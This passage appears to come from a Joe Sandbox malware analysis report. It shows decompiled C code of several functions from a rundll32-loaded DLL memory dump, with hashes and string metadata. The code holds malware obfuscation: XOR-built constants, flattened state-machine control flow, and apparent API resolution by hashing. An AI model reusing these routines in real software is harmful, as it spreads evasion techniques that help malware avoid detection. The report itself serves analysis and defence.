0x10008912
0x10008919
0x10008920
0x10008927
0x1000892e
0x10008937
0x1000893a
0x1000893c
0x1000894a
0x1000895b
0x10008969
0x10008974
0x10008986
0x1000898b
0x10008994

Strings

I[, xrefs: 100088D2
<, xrefs: 100088FD
M56q, xrefs: 10008833

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: I[$M56q$<
API String ID: 0-676366452
Opcode ID: 533792c641697c23b1969ba288ab2592c90c38387ee53b4d6db73c4c28b3a90b
Instruction ID: feb926e86b64a6eeca90413cc5403c2004b8354c474c07f5ba1cecbf70788985
Opcode Fuzzy Hash: 533792c641697c23b1969ba288ab2592c90c38387ee53b4d6db73c4c28b3a90b
Instruction Fuzzy Hash: 4241EF75D0020DEBEF08CFA0C94A9EEBBB1FF04304F208159D511B6290D7B95A59DF95

Uniqueness

Uniqueness Score: -1.00%

Function 10004A2B, Relevance: 3.8, Strings: 3, Instructions: 96
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E10004A2B(void* __ecx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				void* _t87;
				void* _t92;
				void* _t94;
				void* _t96;
				signed int _t102;
				void* _t104;
				signed int* _t106;

				_t106 =  &_v48;
				_v16 = 0x385f10;
				asm("stosd");
				_t94 = __ecx;
				_t104 = 0;
				_t96 = 0x34518db6;
				asm("stosd");
				asm("stosd");
				_v36 = 0xcbb3;
				_v36 = _v36 | 0xf42c2371;
				_v36 = _v36 ^ 0x43021788;
				_v36 = _v36 + 0x4a8d;
				_v36 = _v36 ^ 0xb72f589f;
				_v40 = 0x92a4;
				_t102 = 0x4a;
				_v40 = _v40 * 0x57;
				_v40 = _v40 << 3;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00036b7d;
				_v44 = 0xfc25;
				_v44 = _v44 >> 4;
				_v44 = _v44 << 2;
				_v44 = _v44 | 0xbf219be2;
				_v44 = _v44 ^ 0xbf219961;
				_v48 = 0xa043;
				_v48 = _v48 + 0xffff5a3d;
				_v48 = _v48 / _t102;
				_v48 = _v48 | 0x078bf529;
				_v48 = _v48 ^ 0x07ff8e41;
				_v20 = 0x3370;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x00001c98;
				_v24 = 0x4528;
				_v24 = _v24 | 0xa2a77225;
				_v24 = _v24 ^ 0x1237b29c;
				_v24 = _v24 ^ 0xb090e9f5;
				_v28 = 0xec9c;
				_v28 = _v28 | 0x23d683f6;
				_v28 = _v28 >> 0xf;
				_v28 = _v28 + 0xffff32f8;
				_v28 = _v28 ^ 0xffff48c1;
				_v32 = 0x5f5a;
				_v32 = _v32 ^ 0xd2da3bda;
				_v32 = _v32 + 0xe7f3;
				_v32 = _v32 + 0xffff294c;
				_v32 = _v32 ^ 0xd2da16fe;
				do {
					while(_t96 != 0x1bdf2e1f) {
						if(_t96 == 0x309c6e61) {
							_t92 = E10007E30();
							_t106 = _t106 - 0xc + 0xc;
							_t96 = 0x1bdf2e1f;
							_t104 = _t104 + _t92;
							continue;
						} else {
							if(_t96 == 0x34518db6) {
								_t96 = 0x309c6e61;
								continue;
							}
						}
						goto L7;
					}
					_t87 = E10007544(_v20, _v24, _v28, _t94 + 4, _v32);
					_t106 =  &(_t106[3]);
					_t96 = 0x25e8f6f4;
					_t104 = _t104 + _t87;
					L7:
				} while (_t96 != 0x25e8f6f4);
				return _t104;
			}

0x10004a2b
0x10004a2e
0x10004a42
0x10004a43
0x10004a47
0x10004a49
0x10004a53
0x10004a54
0x10004a55
0x10004a5d
0x10004a65
0x10004a6d
0x10004a75
0x10004a7d
0x10004a8a
0x10004a8b
0x10004a8f
0x10004a94
0x10004a99
0x10004aa1
0x10004aa9
0x10004aae
0x10004ab3
0x10004abb
0x10004ac3
0x10004acb
0x10004ade
0x10004ae2
0x10004aea
0x10004af2
0x10004afa
0x10004aff
0x10004b07
0x10004b0f
0x10004b17
0x10004b1f
0x10004b27
0x10004b2f
0x10004b37
0x10004b3c
0x10004b44
0x10004b4c
0x10004b54
0x10004b5c
0x10004b64
0x10004b6c
0x10004b74
0x10004b74
0x10004b7e
0x10004b9f
0x10004ba4
0x10004ba7
0x10004bac
0x00000000
0x10004b80
0x10004b86
0x10004b88
0x00000000
0x10004b88
0x10004b86
0x00000000
0x10004b7e
0x10004bc4
0x10004bc9
0x10004bcc
0x10004bce
0x10004bd0
0x10004bd0
0x10004bdd

Strings

Z_, xrefs: 10004B4C
(E, xrefs: 10004B07
p3, xrefs: 10004AF2

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (E$Z_$p3
API String ID: 0-2346288438
Opcode ID: f19db067588b1c729666bf50a3d5b19d99c1b8200e5bf7cb63d90fb317ce5846
Instruction ID: 7908451ff43d398edfe4d3dd47729a6452d00dfb1cbc6f0b7171fbae9ac85e7f
Opcode Fuzzy Hash: f19db067588b1c729666bf50a3d5b19d99c1b8200e5bf7cb63d90fb317ce5846
Instruction Fuzzy Hash: 924147B15083419BE358CE24C54A41FFBE1FBD8798F150E1DF599A6260D7B8CA098B8B

Uniqueness

Uniqueness Score: -1.00%

Function 10014E4B, Relevance: 2.7, Strings: 2, Instructions: 164
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E10014E4B(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				void* _t128;
				void* _t138;
				signed int _t141;
				intOrPtr _t143;
				signed int _t144;
				void* _t147;
				intOrPtr* _t148;
				void* _t162;
				signed int _t163;

				_push(_a12);
				_t162 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(0x40);
				_push(__ecx);
				E100056B2(_t128);
				_v20 = 0x10;
				_v32 = 0xa61f;
				_v32 = _v32 + 0xa8ad;
				_t144 = 0;
				_v32 = _v32 ^ 0x00012e5d;
				_t147 = 0x2817a0c8;
				_v36 = 0xad73;
				_t163 = 0x7d;
				_v36 = _v36 * 0x18;
				_v36 = _v36 ^ 0x00106704;
				_v28 = 0xa63d;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x00001262;
				_v76 = 0xc830;
				_v76 = _v76 + 0xffffcf51;
				_v76 = _v76 ^ 0x61a5e6c8;
				_v76 = _v76 + 0xffffd3c1;
				_v76 = _v76 ^ 0x61a52b9a;
				_v60 = 0xaf2b;
				_v60 = _v60 + 0xffff794e;
				_v60 = _v60 << 9;
				_v60 = _v60 ^ 0x0050bd44;
				_v72 = 0xd683;
				_v72 = _v72 * 0x4e;
				_v72 = _v72 >> 7;
				_v72 = _v72 + 0x8cf4;
				_v72 = _v72 ^ 0x00017a15;
				_v48 = 0x2f64;
				_v48 = _v48 + 0x8745;
				_v48 = _v48 >> 9;
				_v48 = _v48 ^ 0x00003344;
				_v52 = 0xde80;
				_v52 = _v52 >> 8;
				_v52 = _v52 + 0xe2ec;
				_v52 = _v52 ^ 0x0000cf48;
				_v24 = 0x26fb;
				_v24 = _v24 ^ 0x99bfc1a1;
				_v24 = _v24 ^ 0x99bffb6f;
				_v56 = 0x40f3;
				_v56 = _v56 << 5;
				_v56 = _v56 ^ 0x9a684b3f;
				_v56 = _v56 ^ 0x9a60118c;
				_v64 = 0xe209;
				_v64 = _v64 / _t163;
				_v64 = _v64 << 2;
				_v64 = _v64 ^ 0xdf73d75b;
				_v64 = _v64 ^ 0xdf73ad9f;
				_v40 = 0xf4ff;
				_v40 = _v40 << 1;
				_v40 = _v40 * 0x32;
				_v40 = _v40 ^ 0x005fe217;
				_v68 = 0xde81;
				_v68 = _v68 + 0xc2e0;
				_v68 = _v68 << 0xc;
				_v68 = _v68 >> 0xc;
				_v68 = _v68 ^ 0x0001df05;
				_v44 = 0x9d75;
				_v44 = _v44 ^ 0xc94ec8c4;
				_v44 = _v44 ^ 0xe16feb53;
				_v44 = _v44 ^ 0x2821dabf;
				do {
					while(_t147 != 0x479232b) {
						if(_t147 == 0x1eeae304) {
							__eflags = E1001C901(_v32,  &_v16,  &_v20, _v36);
							if(__eflags != 0) {
								_t147 = 0x479232b;
								continue;
							}
						} else {
							if(_t147 == 0x264c2085) {
								_push(_v60);
								_push(_v76);
								_t138 = E10012164(0x10001270, _v28, __eflags);
								_t141 = E1000DBE9(_v48, __eflags, _v52, _v24, _t162, E10008CA3(__eflags), 0x40,  &_v16, _v56);
								__eflags = _t141;
								_t126 = _t141 > 0;
								__eflags = _t126;
								_t144 = 0 | _t126;
								E1001C5F7(_v64, _v40, _v68, _v44, _t138);
							} else {
								if(_t147 != 0x2817a0c8) {
									goto L18;
								} else {
									_t147 = 0x1eeae304;
									continue;
								}
							}
						}
						L21:
						return _t144;
					}
					_t148 =  &_v16;
					__eflags = _v16 - _t144;
					if(_v16 != _t144) {
						do {
							_t143 =  *_t148;
							__eflags = _t143 - 0x30;
							if(_t143 < 0x30) {
								L11:
								__eflags = _t143 - 0x61;
								if(_t143 < 0x61) {
									L13:
									__eflags = _t143 - 0x41;
									if(_t143 < 0x41) {
										L15:
										 *_t148 = 0x58;
									} else {
										__eflags = _t143 - 0x5a;
										if(_t143 > 0x5a) {
											goto L15;
										}
									}
								} else {
									__eflags = _t143 - 0x7a;
									if(_t143 > 0x7a) {
										goto L13;
									}
								}
							} else {
								__eflags = _t143 - 0x39;
								if(_t143 > 0x39) {
									goto L11;
								}
							}
							_t148 = _t148 + 1;
							__eflags =  *_t148 - _t144;
						} while ( *_t148 != _t144);
					}
					_t147 = 0x264c2085;
					L18:
					__eflags = _t147 - 0xaeeb649;
				} while (__eflags != 0);
				goto L21;
			}

0x10014e52
0x10014e56
0x10014e58
0x10014e5c
0x10014e60
0x10014e62
0x10014e63
0x10014e68
0x10014e73
0x10014e7d
0x10014e85
0x10014e87
0x10014e8f
0x10014e94
0x10014ea8
0x10014ea9
0x10014ead
0x10014eb5
0x10014ebd
0x10014ec2
0x10014eca
0x10014ed2
0x10014eda
0x10014ee2
0x10014eea
0x10014ef2
0x10014efa
0x10014f02
0x10014f07
0x10014f0f
0x10014f1c
0x10014f20
0x10014f25
0x10014f2d
0x10014f35
0x10014f3d
0x10014f45
0x10014f4a
0x10014f52
0x10014f5a
0x10014f5f
0x10014f67
0x10014f6f
0x10014f77
0x10014f7f
0x10014f87
0x10014f8f
0x10014f94
0x10014f9c
0x10014fa4
0x10014fb7
0x10014fbb
0x10014fc0
0x10014fc8
0x10014fd0
0x10014fd8
0x10014fe1
0x10014fe5
0x10014fed
0x10014ff5
0x10014ffd
0x10015002
0x10015007
0x1001500f
0x10015017
0x1001501f
0x10015027
0x1001502f
0x1001502f
0x10015035
0x10015063
0x10015065
0x1001506b
0x00000000
0x1001506b
0x10015037
0x1001503d
0x100150aa
0x100150b3
0x100150bb
0x100150e6
0x100150f2
0x100150fc
0x100150fc
0x100150fc
0x10015103
0x1001503f
0x10015045
0x00000000
0x10015047
0x10015047
0x00000000
0x10015047
0x10015045
0x1001503d
0x1001510e
0x10015114
0x10015114
0x1001506f
0x10015073
0x10015077
0x10015079
0x10015079
0x1001507b
0x1001507d
0x10015083
0x10015083
0x10015085
0x1001508b
0x1001508b
0x1001508d
0x10015093
0x10015093
0x1001508f
0x1001508f
0x10015091
0x00000000
0x00000000
0x10015091
0x10015087
0x10015087
0x10015089
0x00000000
0x00000000
0x10015089
0x1001507f
0x1001507f
0x10015081
0x00000000
0x00000000
0x10015081
0x10015096
0x10015097
0x10015097
0x10015079
0x1001509b
0x100150a0
0x100150a0
0x100150a0
0x00000000

Strings

So, xrefs: 1001501F
D3, xrefs: 10014F4A

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: D3$So
API String ID: 0-1798533957
Opcode ID: f8f88fcedb07124a3c2552d532e28816b7cee94d3e288d1335ce9db65d1f1dfa
Instruction ID: a36dc09e0a722225465dbaf5dc1fbc69e17eb54196c5202d43f44068f2dc291a
Opcode Fuzzy Hash: f8f88fcedb07124a3c2552d532e28816b7cee94d3e288d1335ce9db65d1f1dfa
Instruction Fuzzy Hash: 3D7164710093419FD355CE60C88990FBBE1FBC5788F40491DF1969A2A1D3B6DA8ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 10011B71, Relevance: 2.7, Strings: 2, Instructions: 164
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10011B71(intOrPtr* __ecx, void* __edx, signed int _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t130;
				signed int _t156;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				void* _t163;
				intOrPtr* _t180;
				signed int* _t181;
				signed int* _t184;

				_t181 = _a4;
				_push(_a8);
				_t180 = __ecx;
				_push(_t181);
				_push(__ecx);
				E100056B2(_t130);
				_a4 = 0x4753;
				_t184 =  &(( &_v100)[4]);
				_a4 = _a4 >> 4;
				_t163 = 0x1ce4a29c;
				_t158 = 0x7b;
				_a4 = _a4 / _t158;
				_a4 = _a4 + 0xffff71bd;
				_a4 = _a4 ^ 0xffff4206;
				_v72 = 0xd68c;
				_t159 = 5;
				_v72 = _v72 * 0x66;
				_v72 = _v72 ^ 0x00552ab5;
				_v56 = 0xc5bd;
				_v56 = _v56 * 0x1e;
				_v56 = _v56 ^ 0x00172fa5;
				_v96 = 0x2782;
				_v96 = _v96 << 5;
				_v96 = _v96 >> 2;
				_v96 = _v96 / _t159;
				_v96 = _v96 ^ 0x00004dd3;
				_v60 = 0xbb2b;
				_v60 = _v60 ^ 0x9bc1f403;
				_v60 = _v60 ^ 0x9bc17fed;
				_v64 = 0x890;
				_t160 = 0x79;
				_v64 = _v64 / _t160;
				_v64 = _v64 ^ 0x00001224;
				_v68 = 0xd52d;
				_v68 = _v68 | 0x66ad6dc2;
				_v68 = _v68 ^ 0x66addc3f;
				_v80 = 0x2d15;
				_v80 = _v80 ^ 0xe1b04c0e;
				_v80 = _v80 | 0x8df21731;
				_v80 = _v80 ^ 0xedf2018b;
				_v84 = 0x4d41;
				_v84 = _v84 + 0xffffece7;
				_v84 = _v84 ^ 0xe6ee3790;
				_v84 = _v84 * 0x66;
				_v84 = _v84 ^ 0x02d92ffd;
				_v76 = 0x5bdd;
				_v76 = _v76 * 0x72;
				_v76 = _v76 << 0xf;
				_v76 = _v76 ^ 0x7435051d;
				_v88 = 0x9998;
				_v88 = _v88 * 0xf;
				_v88 = _v88 << 3;
				_v88 = _v88 + 0xffff20a8;
				_v88 = _v88 ^ 0x004709cc;
				_v92 = 0xdec6;
				_v92 = _v92 >> 0xc;
				_v92 = _v92 ^ 0x867abd03;
				_v92 = _v92 * 0x46;
				_v92 = _v92 ^ 0xc58fdc4c;
				_v100 = 0x13e8;
				_v100 = _v100 << 9;
				_v100 = _v100 * 0x42;
				_v100 = _v100 + 0xff79;
				_v100 = _v100 ^ 0x0a449f79;
				do {
					while(_t163 != 0x2937ce5) {
						if(_t163 == 0x183d422a) {
							E10018582(_v84, _t180 + 4, __eflags, _v76,  &_v52, _v88, _v92);
						} else {
							if(_t163 == 0x1ce4a29c) {
								_t163 = 0x35771045;
								 *_t181 =  *_t181 & 0x00000000;
								_t181[1] = _v100;
								continue;
							} else {
								if(_t163 == 0x1ed204aa) {
									E1000CD04(_v64,  *_t180, _v68,  &_v52, _v80);
									_t184 =  &(_t184[3]);
									_t163 = 0x183d422a;
									continue;
								} else {
									if(_t163 == 0x3303492c) {
										_push(_t163);
										_t156 = E100157E8(_t181[1]);
										 *_t181 = _t156;
										__eflags = _t156;
										if(__eflags != 0) {
											_t163 = 0x2937ce5;
											continue;
										}
									} else {
										if(_t163 != 0x35771045) {
											goto L13;
										} else {
											_t181[1] = E10004A2B(_t180);
											_t163 = 0x3303492c;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t181;
						_t129 =  *_t181 != 0;
						__eflags = _t129;
						return 0 | _t129;
					}
					E1001F3E9(_v56, _v96, _v60, _t181,  &_v52);
					_t184 =  &(_t184[3]);
					_t163 = 0x1ed204aa;
					L13:
					__eflags = _t163 - 0x1f54ddf;
				} while (__eflags != 0);
				goto L16;
			}

0x10011b77
0x10011b7c
0x10011b80
0x10011b82
0x10011b84
0x10011b85
0x10011b8a
0x10011b95
0x10011b98
0x10011ba3
0x10011baa
0x10011baf
0x10011bb5
0x10011bbd
0x10011bc5
0x10011bd2
0x10011bd5
0x10011bd9
0x10011be1
0x10011bee
0x10011bf2
0x10011bfa
0x10011c02
0x10011c07
0x10011c14
0x10011c18
0x10011c20
0x10011c28
0x10011c30
0x10011c38
0x10011c44
0x10011c47
0x10011c4b
0x10011c53
0x10011c5b
0x10011c63
0x10011c6b
0x10011c73
0x10011c7b
0x10011c83
0x10011c8b
0x10011c93
0x10011c9b
0x10011ca8
0x10011cac
0x10011cb4
0x10011cc1
0x10011cc5
0x10011cca
0x10011cd2
0x10011cdf
0x10011ce3
0x10011ce8
0x10011cf0
0x10011cf8
0x10011d00
0x10011d05
0x10011d12
0x10011d16
0x10011d23
0x10011d30
0x10011d3a
0x10011d3e
0x10011d46
0x10011d4e
0x10011d4e
0x10011d5c
0x10011e2e
0x10011d62
0x10011d68
0x10011ddc
0x10011dde
0x10011de1
0x00000000
0x10011d6a
0x10011d70
0x10011dc6
0x10011dcb
0x10011dce
0x00000000
0x10011d72
0x10011d78
0x10011d9b
0x10011d9f
0x10011da4
0x10011da7
0x10011da9
0x10011daf
0x00000000
0x10011daf
0x10011d7a
0x10011d7c
0x00000000
0x10011d82
0x10011d89
0x10011d8c
0x00000000
0x10011d8c
0x10011d7c
0x10011d78
0x10011d70
0x10011d68
0x10011e36
0x10011e38
0x10011e3d
0x10011e3d
0x10011e44
0x10011e44
0x10011dfb
0x10011e00
0x10011e03
0x10011e08
0x10011e08
0x10011e08
0x00000000

Strings

SG, xrefs: 10011B8A
AM, xrefs: 10011C8B

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: AM$SG
API String ID: 0-2359636636
Opcode ID: 335b760aecf9311ccc4c76b46dd11e98044fb8b6b4e5fe0ea9c494827d2a9ad0
Instruction ID: 73a1d719dcb80061ca56764ad851f481a03b11d3d12b559eb37b6c303cc90ad2
Opcode Fuzzy Hash: 335b760aecf9311ccc4c76b46dd11e98044fb8b6b4e5fe0ea9c494827d2a9ad0
Instruction Fuzzy Hash: 807147B15083429FD368CF21D48645FBBE1FBC4348F504A1EF5968A260D375DA89CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1001C6AD, Relevance: 2.6, Strings: 2, Instructions: 148
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1001C6AD(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char _v328;
				char _t161;
				signed int _t164;
				void* _t167;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				char* _t174;
				intOrPtr* _t193;
				void* _t194;
				void* _t195;
				void* _t196;

				_v40 = 0xfa39;
				_v40 = _v40 + 0xdb01;
				_v40 = _v40 + 0xffffe592;
				_v40 = _v40 ^ 0x0001c62b;
				_v68 = 0xbea4;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 ^ 0x00007ac8;
				_v36 = 0x4356;
				_v36 = _v36 >> 0x10;
				_v36 = _v36 >> 4;
				_v36 = _v36 ^ 0x00002e98;
				_v12 = 0xe2d2;
				_v12 = _v12 >> 6;
				_v12 = _v12 + 0xffff2c83;
				_t193 = __ecx;
				_v12 = _v12 * 0x62;
				_v12 = _v12 ^ 0xffb02725;
				_v16 = 0xb4cd;
				_v16 = _v16 >> 9;
				_v16 = _v16 | 0xafffddff;
				_v16 = _v16 ^ 0xafffea00;
				_v8 = 0x68cb;
				_v8 = _v8 | 0xb32e4b28;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x0d8dd4c4;
				_v8 = _v8 ^ 0x38786c55;
				_v48 = 0xfb83;
				_v48 = _v48 | 0x7a1a2a9c;
				_v48 = _v48 ^ 0x7a1ab4a3;
				_v20 = 0x79fd;
				_t169 = 3;
				_v20 = _v20 / _t169;
				_v20 = _v20 + 0x1426;
				_t170 = 0x65;
				_v20 = _v20 / _t170;
				_v20 = _v20 ^ 0x00003bd3;
				_v28 = 0xa065;
				_t171 = 0x78;
				_v28 = _v28 / _t171;
				_v28 = _v28 | 0x67e4385d;
				_v28 = _v28 ^ 0x67e41ce2;
				_v52 = 0xcb25;
				_v52 = _v52 | 0x001bc1db;
				_v52 = _v52 ^ 0x001ba08f;
				_v60 = 0xfe76;
				_v60 = _v60 + 0xffff45c9;
				_v60 = _v60 ^ 0x00003b0c;
				_v32 = 0xb195;
				_v32 = _v32 + 0xffff6114;
				_v32 = _v32 << 6;
				_v32 = _v32 ^ 0x0004e941;
				_v24 = 0xa461;
				_v24 = _v24 >> 0xd;
				_t172 = 0x2a;
				_v24 = _v24 / _t172;
				_v24 = _v24 * 0x41;
				_v24 = _v24 ^ 0x00004365;
				_v64 = 0x6361;
				_t173 = 0x6a;
				_t174 =  &_v328;
				_v64 = _v64 / _t173;
				_v64 = _v64 ^ 0x00000cc9;
				_v56 = 0x48bf;
				_v56 = _v56 ^ 0x5ae3b612;
				_v56 = _v56 ^ 0x5ae38705;
				_v44 = 0xaf17;
				_v44 = _v44 | 0xd3b2bd8d;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x7657b8ea;
				while(1) {
					_t161 =  *_t193;
					if(_t161 == 0) {
						break;
					}
					if(_t161 == 0x2e) {
						 *_t174 = 0;
					} else {
						 *_t174 = _t161;
						_t174 = _t174 + 1;
						_t193 = _t193 + 1;
						continue;
					}
					L6:
					_t194 = E10015719(_v40, _v68, _v36,  &_v328, _v12);
					_t196 = _t195 + 0xc;
					if(_t194 != 0) {
						L8:
						_t164 = E10010EAE(_t193 + 1, _v28, _v52, _v60, _v32);
						_push(_v44);
						_push(_v56);
						_push(_t194);
						_push(_v64);
						return E10002419(_v24, _t164 ^ 0x165fe069);
					}
					_t167 = E10018DF5( &_v328, _v16, _v8, _v48, _v20);
					_t194 = _t167;
					_t196 = _t196 + 0xc;
					if(_t194 != 0) {
						goto L8;
					}
					return _t167;
				}
				goto L6;
			}

0x1001c6b6
0x1001c6bf
0x1001c6c6
0x1001c6cd
0x1001c6d4
0x1001c6db
0x1001c6df
0x1001c6e6
0x1001c6ed
0x1001c6f1
0x1001c6f5
0x1001c6fc
0x1001c703
0x1001c707
0x1001c716
0x1001c718
0x1001c71b
0x1001c722
0x1001c729
0x1001c72d
0x1001c734
0x1001c73b
0x1001c742
0x1001c749
0x1001c74d
0x1001c754
0x1001c75b
0x1001c762
0x1001c769
0x1001c770
0x1001c77a
0x1001c77f
0x1001c784
0x1001c78e
0x1001c793
0x1001c798
0x1001c79f
0x1001c7a9
0x1001c7ae
0x1001c7b3
0x1001c7ba
0x1001c7c1
0x1001c7c8
0x1001c7cf
0x1001c7d6
0x1001c7dd
0x1001c7e4
0x1001c7eb
0x1001c7f2
0x1001c7f9
0x1001c7fd
0x1001c804
0x1001c80b
0x1001c812
0x1001c817
0x1001c81e
0x1001c821
0x1001c82a
0x1001c834
0x1001c837
0x1001c83d
0x1001c840
0x1001c847
0x1001c84e
0x1001c855
0x1001c85c
0x1001c863
0x1001c86a
0x1001c86e
0x1001c87f
0x1001c87f
0x1001c883
0x00000000
0x00000000
0x1001c879
0x1001c887
0x1001c87b
0x1001c87b
0x1001c87d
0x1001c87e
0x00000000
0x1001c87e
0x1001c88a
0x1001c8a2
0x1001c8a4
0x1001c8a9
0x1001c8cb
0x1001c8da
0x1001c8df
0x1001c8e7
0x1001c8ec
0x1001c8ed
0x00000000
0x1001c8f8
0x1001c8bd
0x1001c8c2
0x1001c8c4
0x1001c8c9
0x00000000
0x00000000
0x1001c900
0x1001c900
0x00000000

Strings

Ulx8, xrefs: 1001C754
]8g, xrefs: 1001C7B3

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Ulx8$]8g
API String ID: 0-1828074717
Opcode ID: 5efb796bbd5c0bd0a1b08533b1cf97a22a6e006468b28043f05add0be14b9d1a
Instruction ID: 5bc45f7731ee84d747845716ac0e0d381f413dec0c038b2a0d0c64420890e08a
Opcode Fuzzy Hash: 5efb796bbd5c0bd0a1b08533b1cf97a22a6e006468b28043f05add0be14b9d1a
Instruction Fuzzy Hash: 95615571D0121DEBEF08CFA0D84A5EEBBB2FF04314F208158D411BA2A4D7B95A59CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001CAA0, Relevance: 2.6, Strings: 2, Instructions: 147
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1001CAA0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t121;
				void* _t139;
				void* _t143;
				void* _t145;
				void* _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int* _t174;

				_push(_a16);
				_t165 = _a4;
				_t143 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t121);
				_v88 = 0xa345;
				_t174 =  &(( &_v96)[6]);
				_t166 = 0;
				_t145 = 0x388706b5;
				_t167 = 0x17;
				_v88 = _v88 / _t167;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0xb586a132;
				_v88 = _v88 ^ 0xb586a8c9;
				_v68 = 0x3c18;
				_t168 = 0x75;
				_v68 = _v68 / _t168;
				_v68 = _v68 | 0xfaaa2e7e;
				_v68 = _v68 ^ 0xfaaa5d3e;
				_v72 = 0x292c;
				_t169 = 0x30;
				_v72 = _v72 / _t169;
				_t170 = 0x7d;
				_v72 = _v72 / _t170;
				_v72 = _v72 ^ 0x00000df9;
				_v64 = 0xacd5;
				_v64 = _v64 + 0x8377;
				_v64 = _v64 ^ 0x00014058;
				_v92 = 0x91f4;
				_v92 = _v92 ^ 0x59127442;
				_v92 = _v92 ^ 0xd1a3ee64;
				_v92 = _v92 ^ 0x1200e02f;
				_v92 = _v92 ^ 0x9ab1bc65;
				_v76 = 0x8653;
				_v76 = _v76 | 0x93bc935f;
				_v76 = _v76 << 4;
				_v76 = _v76 ^ 0x3bc90d53;
				_v96 = 0x9841;
				_t171 = 0x42;
				_v96 = _v96 / _t171;
				_v96 = _v96 * 0x19;
				_v96 = _v96 * 0x44;
				_v96 = _v96 ^ 0x000f441a;
				_v56 = 0xfe3f;
				_v56 = _v56 + 0xc16;
				_v56 = _v56 ^ 0x000102f3;
				_v60 = 0xb3bd;
				_v60 = _v60 + 0xffff84e2;
				_v60 = _v60 ^ 0x0000629b;
				_v80 = 0x779;
				_v80 = _v80 << 0xa;
				_v80 = _v80 << 2;
				_v80 = _v80 | 0x746c3a89;
				_v80 = _v80 ^ 0x747fb8a8;
				_v84 = 0x97f4;
				_v84 = _v84 ^ 0xacb5c4e6;
				_v84 = _v84 * 0x15;
				_v84 = _v84 | 0x645395ef;
				_v84 = _v84 ^ 0x6edfb60f;
				do {
